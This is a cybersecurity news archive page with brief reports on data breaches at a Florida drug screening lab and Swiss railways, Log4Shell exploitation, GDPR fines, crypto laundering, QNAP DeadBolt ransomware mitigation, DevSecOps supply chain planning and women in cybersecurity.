Category Archives: News

Data Breach at Drug Screening Lab

Read Time:1 Minute, 46 Second

Data Breach at Drug Screening Lab

A configuration error has caused a prolonged data breach at a Florida County’s drug screening laboratory. 

The security incident occurred at St. Lucie County’s Drug Screening Lab (SLC Lab), which supplies drug testing services for employment, court cases and other purposes.

In a statement released January 20 2022, County leaders said that a misconfiguration detected in the lab’s website portal had inadvertently made some of the portal users’ personal data accessible for more than four years.

“Upon learning of this issue, SLC Lab corrected the misconfiguration and immediately launched an investigation in consultation with outside cybersecurity professionals who regularly investigate and analyze these types of incidents,” said the officials. 

“SLC Lab devoted considerable time and effort to determine what information may have been accessible to unauthorized users.”

A digital forensic investigation was launched to determine what data had been exposed by mistake. 

The County said: “SLC Lab discovered on December 28 2021 that the website portal misconfiguration allowed for data to be accessible to certain portal users between June 2 2017 and October 13 2021.”

Data exposed in the incident included full names and one or more of the following: Social Security numbers, dates of birth and limited lab test type and result information.

“To date, SLC Lab is not aware of any reports of identity fraud or improper use of any information as a direct result of this incident,” said the County. 

On January 20, the lab began notifying affected individuals of the security incident by letter and encouraging them to enroll in complimentary credit monitoring services. County leaders did not state how many residents of St. Lucie County may have had their data compromised.

St. Lucie County spokesman Erick Gill told WPTV that the mistake impacted no other data in the care of the county. 

“SLC Lab is committed to maintaining the privacy of personal information in its possession and has taken many precautions to safeguard it,” said Gill. 

He added: “SLC Lab continually evaluates and modifies its practices to enhance the security and privacy of the personal information it maintains.”

Read More

Hacker Flags Flaw in Swiss Railway System

Read Time:1 Minute, 50 Second

Hacker Flags Flaw in Swiss Railway System

An anonymous hacker has raised the alarm after discovering a vulnerability impacting Switzerland’s national railway system.

The flaw allowed the hacker to gain access to personal data belonging to around 500,000 individuals who had purchased tickets to ride on Swiss Federal Railways (SFR).

After detecting a weak spot in SFR’s Swiss Card system, the hacker reported it to the Rundschau show, which airs on Swiss public television, SRF.

Information left vulnerable by the flaw included travelers’ names, dates of birth, the number of first- and second-class tickets they purchased, places of departure and final destinations.

Speaking to the Rundschau program, the hacker said that anyone could have easily viewed the data as no specialist IT knowledge was needed to exploit the flaw. 

“The sensitive data was practically public on the internet,” said the hacker. 

The security breach was reported to Switzerland’s Federal Data Protection Commissioner. 

According to Swiss news site Swiss Info, the data compromised by the hacker was never made public and has since been secured by SFR. 

The hacker said that their motivation in exploiting the flaw was to expose its existence in the hope of averting a potentially malicious cyber-attack. 

“This is a huge meltdown for Swiss Railways,” Otto Hostettler, an author and journalist specializing in cybercrime, told the Rundschau program. 

“Such data can be sold in hacker forums on the dark web. In the wrong hands, it would have great potential for abuse.”

Cyber-criminals have been known to target the Swiss rail industry. In May 2020, hackers stole data from Swiss train manufacturer Stadler Rail and demanded a payment of $6m in Bitcoin for its return.

Following the attack, Stadler released a statement saying that it “is not and has never been willing to make payments to blackmailers and has not entered into negotiations.”

In response to Stadler’s rebuff, the cyber-thieves published images of some of the stolen files on the internet. A message accompanying the images stated that the criminals had swiped no fewer than 10,000 documents from the train maker. 

The company said it had backups of all the data compromised in the attack. 

Read More

European nations issue record €1.1 billion in GDPR fines

Read Time:32 Second

European data protection authorities have issued fines of €1.1 billion ($1.2 billion) under the General Data Protection Regulation (GDPR) since 28 January 2021, according to the annual GDPR Fines and Data Breach Survey by international law firm DLA Piper.

The survey—which spanned 27 European Union members, the European Economic Association members Norway, Iceland, and Liechtenstein, and now-former EU member the UK—found there was a sevenfold increase in fines in 2021.

[ Check out this checklist for minimizing damage from a data breach. | Get the latest from CSO by signing up for our newsletters. ]

To read this article in full, please click here

Read More

Access broker found exploiting Log4j vulnerability in VMware

Read Time:42 Second

A gang of cybercriminals known for breaking into computer systems and selling access to them has been discovered exploiting an Apache Log4j vulnerability, Log4Shell, in  unpatched VMware Horizon to plant cryptominers and backdoors on targeted systems.

In a blog published Wednesday, Blackberry’ researchers Ryan Gibson, Codi Starks and Will Ikard revealed that Prophet Spider was behind the attacks, which could be reliably detected by monitoring ws_TomcatService.exe, the Tomcat service used by VMware Horizon.

The researchers explained that after exploiting the Log4Shell vulnerability to penetrate a system, the attackers use PowerShell commands to download a second-stage payload. In the case of Prophet Spider, the payloads were primarily cryptocurrency mining software, although in some instances, Cobalt Strike beacons—a kind of system backdoor—were also installed on the computers.

To read this article in full, please click here

Read More

Mentoring and Role Models Key to Improving Female Representation in Cybersecurity

Read Time:2 Minute, 32 Second

Mentoring and Role Models Key to Improving Female Representation in Cybersecurity

The importance of mentoring and role models in helping women develop careers in cybersecurity was emphasized during the HackerOne Women in Cybersecurity Press Roundtable.

The panel, which comprised a range of leading female figures in the cybersecurity industry, discussed practical ways of improving gender diversity in the industry.

Marjorie Janiewicz, chief revenue officer at HackerOne, began by setting out a bleak picture regarding cyber’s gender imbalance. “It’s no secret that the cyber skills gap is rapidly growing, and women continue to be a minority in technical and cyber roles. We especially notice that underrepresentation in leadership roles,” she outlined.

The panelists then highlighted personal experiences that inspired them to successful careers in cyber. Keren Elazari, a cybersecurity analyst, researcher, author and speaker, described initially feeling “lonely” operating in the industry as an anonymous white hat hacker. However, when attending her first hacker conference, Y2hacK, she became inspired mixing and interacting with like-minded people. In addition, while there were only three women present at the event, “the fact the organizer of the event was a woman, that gave me the signal that although I don’t see anyone that looks like me around, there’s space for me in this community.”

Sandra McLeod, head of security assurance at Zoom, similarly emphasized the importance of role models during her career. “I had the opportunity to work among and alongside some incredible top talent that I learned from and had some amazing mentors who encouraged me to take that next step.”

While the panelists had female role models they could look up to while navigating the start of their career in the industry, this is often not the case for many women. Lynn Dohm, executive director of Women in CyberSecurity, noted: “It’s hard to be what you cannot see and when you have that power of community and you have those women in front of you that you aspire to be, it builds up your confidence and strength to think ‘yes this is a place where we belong’ and we can advance in our careers.”

Therefore, a key means of enabling women to succeed in cyber is “creating the power of community where there is that collective strength as a network and as a community to grow and expand our cyber careers collectively.”

Annika Erikson, senior security manager at Salesforce, concurred, explaining how mentoring helped open doors to her in the industry. “I’ve had mentors, both women and men, that have invited me to tables I would never have invited myself to and brought me into conversations.” She said that these experiences “gave me the confidence to then invite myself to more discussions.”

Erikson added that she now offers the same mentoring opportunities to help others in the sector. “Anybody can be a mentor to anyone in their organization or across organizations and invite them into those discussions and conversations. This will let them know their contributions are extremely valuable,” she commented.

Read More

DevSecOps plan process

Read Time:4 Minute, 27 Second

In the DevOps and DevSecOps Introduction, What is DevOps, we reviewed how our security teams overlay onto DevOps for visibility and increased security throughout the software lifecycle. This article explores DevSecOps during the planning phase of the project and why it’s important for developers to be trained on how to help protect the software they are writing from Free Open-Source Software “FOSS” risks and supply chain attacks.

Development’s role in DevSecOps

Development teams that have an Agile culture will be familiar with DevOps frameworks and the ability to deal with rapid change effectively. As developers work through user stories, they may search for available FOSS that is useful and speeds up the user story delivery. DevSecOps collaboration with developers during this process helps protect user stories from the risks associated with using FOSS and supply chain attacks.

Free Open-Source Software “FOSS” risks

Arguably the most popular FOSS is the Linux operating system released in 1991 by Linus Torvalds. It is free to use, and the source code is publicly available. The copyleft license type that covers Linux requires a developer who modifies certain parts of the Linux operating system to share the source code they created. The two main categories of FOSS licenses are copyleft and permissive.

Copyleft license means that the software author has a claim on the copyright of their work, and anyone that uses, modifies, or shares the work must make their code publicly available. A developer in a private company that adds to or modifies copyleft licensed software could be forced to expose proprietary code or trade secrets. An example of a copyleft license is GNU v2 created by Richard Stallman.

Permissive license allows much more freedom to the developer when adding to or modifying the software and generally requires nothing in return. Some permissive licenses attach more requirements than others. But in general, they are less risky for a business to use with proprietary software. An example of a permissive license is the MIT License, created at the Massachusetts Institute for Technology.

The US Courts have set a precedent in favor of the FOSS author when there is a dispute. Which is why the organizations security and compliance teams should create a policy providing an authorized list of FOSS licenses for use within the organization. Developers should consult with Security and Compliance teams for any additional questions or request for FOSS exceptions.

The collaboration of the team will protect the company from potentially having to share proprietary software, paying fines, or defending itself in litigation. More important, protecting proprietary software from a FOSS license violation can also limit the risk of a supply chain attack.

Supply chain attacks

In 2020, the network monitoring company SolarWinds unknowingly distributed malicious software to their customers. It was a huge event that went unnoticed for months and exposed many well-known technology companies to hackers. Evidence of the incident showed that malicious software was injected into the SolarWinds Orion software during the build process. When the new version of software was released to customers, hackers were unknowingly granted access to systems.

Supply chain attacks occur when developers include (accidently or intentionally) FOSS that is malicious or contains vulnerabilities with their own software during the build process. With it imbedded in the developer’s software release, the malicious software acts like a trojan horse. Once it’s been installed by a user, the malicious software activates and either waits for commands from the controller or starts performing pre-defined actions like a ransomware attack, obtaining login and password credentials, or scanning the network for other places it can jump to. Below are some of the common ways supply chain attacks happen along with how DevSecOps can work with developer teams to prevent these during the planning process.

Compromised software updates – Software developers release patches and updates to their software on a regular cadence. DevSecOps helps protect users by making sure developers only use software updates that come from a valid and protected source.
Inherent defects in FOSS – FOSS is not immune to bugs, security flaws, and malicious actors. DevSecOps advises software developers to pull FOSS from reputable public repositories. Developers should also search the version history for security issues or concerns before implementing FOSS into their software builds.
FOSS download limitations – FOSS from public repositories and registries have a limited number of daily downloads for free. Large development organizations can quickly exceed these daily downloads which can result in failed software builds or delay a planned production deployment. DevSecOps can provide private repositories and registries for developers to store FOSS that is under the control of the business and has unlimited downloads.
Manual steps in a build and release process – Developers should plan their projects around the use of automated build and release pipelines. Pipelines allow DevSecOps to use security scanning tools to identify malicious software.

Licensing and supply chain attacks can expose business systems to serious risks and be very difficult to eliminate when embedded in a software release. Planning with DevSecOps helps software developers navigate the risks associated with FOSS and supply chain attacks.

Next steps

When planning is complete and developers begin coding their software, they need a secure place to store and protect their work.  The next article will cover how we secure repositories to protect the company’s proprietary code.

Read More

Nearly $9bn Laundered in Cryptocurrency in 2021

Read Time:1 Minute, 48 Second

Nearly $9bn Laundered in Cryptocurrency in 2021

Threat actors laundered $8.6bn in cryptocurrency last year, although the real figure could be much higher when “non-crypto” crimes are included, according to Chainalysis.

The firm provides analysis and investigation software to help shine a light on the murky world of blockchains and decentralized finance (DeFi).

Findings from an upcoming report released yesterday revealed a 30% year-on-year increase in the value associated with money laundering activity via cryptocurrency in 2021.

However, that’s not the whole story.

“We also need to note that these numbers only account for funds derived from ‘cryptocurrency-native’ crime, meaning cyber-criminal activity such as darknet market sales or ransomware attacks in which profits are virtually always derived in cryptocurrency rather than fiat currency,” the firm explained.

“It’s more difficult to measure how much fiat currency derived from offline crime – traditional drug trafficking, for example – is converted into cryptocurrency to be laundered. However, we know anecdotally this is happening.”

Despite its reputation for being something of a Wild West, it’s easier to monitor money laundering efforts where cryptocurrency is involved because of the transparent nature of blockchains.

To that end, DeFi protocols received the majority of illicit funds last year, the first since 2018 where centralized exchanges haven’t been the number one recipient, according to Chainalysis.

That amounts to a 1,964% year-on-year increase in total value received by DeFi protocols from illicit addresses to a total of $900m in 2021. North Korean hackers, who stole an estimated $400m of cryptocurrency last year, were heavy users of DeFi, Chainalysis claimed.

The good news is that money laundering is still concentrated on a small number of services, although slightly less so than in 2020.

The analysis revealed that over half 55% of all cryptocurrency sent from illicit addresses went to only 270 service deposit addresses.

Among these addresses were those associated with two exchanges sanctioned by the US Treasury last year: Suex and Chatex.

“Law enforcement can strike a huge blow against cryptocurrency-based crime and significantly hamper criminals’ ability to access their digital assets by disrupting these services,” Chainalysis claimed.

Read More

QNAP: Act Now to Mitigate DeadBolt Ransomware

Read Time:1 Minute, 58 Second

QNAP: Act Now to Mitigate DeadBolt Ransomware

A leading maker of network-attached storage (NAS) devices is urging customers to upgrade to the latest software version and reconfigure their systems in order to thwart a new ransomware campaign.

Taiwan vendor QNAP released a statement yesterday in response to the mounting threat from a new variant known as “DeadBolt.”

It advised customers to ensure their devices are not exposed to the internet, by opening the Security Counselor and checking if the dashboard displays the following message: “The System Administration service can be directly accessible from an external IP address via the following protocols: HTTP.”

If it does, organizations should check the Virtual Server, NAT or port forwarding settings, and disable the port forwarding setting of the NAS management service port – which, by default, means port 8080 and 443.

Next, they should disable UPnP by going to “myQNAPcloud” on the QTS menu, clicking “Auto Router Configuration,” and de-selecting “Enable UPnP port forwarding,” the vendor explained.

“DeadBolt has been widely targeting all NAS exposed to the internet without any protection and encrypting users’ data for Bitcoin ransom,” it warned.

“QNAP urges all QNAP NAS users to follow the security setting instructions below to ensure the security of QNAP NAS and routers, and immediately update QTS to the latest available version.”

The threat actors behind DeadBolt are purportedly claiming to leverage a zero-day exploit in their attacks, which would presumably work even on updated QTS versions. However, disconnecting from the internet would keep organizations safe.

“Organizations right now should have critical insight into the use of SSH and Telnet into their QNAP devices as well as connections on port 8080 and 443 emanating from their QNAPs and historic levels of UPnP traffic,” advised Armis cyber risk officer, Andy Norton.

“There are threads surfacing on some of the support forums, where the decryption key did not work after payment, but it is also possible to remove DeadBolt using other utilities on the QNAP device.”

A report out yesterday warned that vulnerability exploits are an increasingly popular initial access vector for ransomware gangs, with the number of bugs associated with such attacks jumping 29% year-on-year in 2021.

This is far from the first time QNAP customers have been targeted by ransomware. Over the past year, AgeLocker and eCh0raix variants prompted warnings from the vendor.

Read More

12 steps to take when there’s an active adversary on your network

Read Time:35 Second

CISOs know they must respond quickly and effectively to an incident, yet surveys point to continuing challenges to deliver on that goal.

The State of Incident Response 2021 report, from tech companies Kroll, Red Canary and VMware, surveyed more than 400 IS professionals and 100 legal and compliance leaders and found that 45% of them identified inadequacies in detection and response resources. Additionally, 55% wanted to improve time to containment and incident response automation.

[ Learn 8 pitfalls that undermine security program success and 12 tips for effectively presenting cybersecurity to the board. | Sign up for CSO newsletters. ]

There are compelling reasons for investing in improved incident response.

To read this article in full, please click here

Read More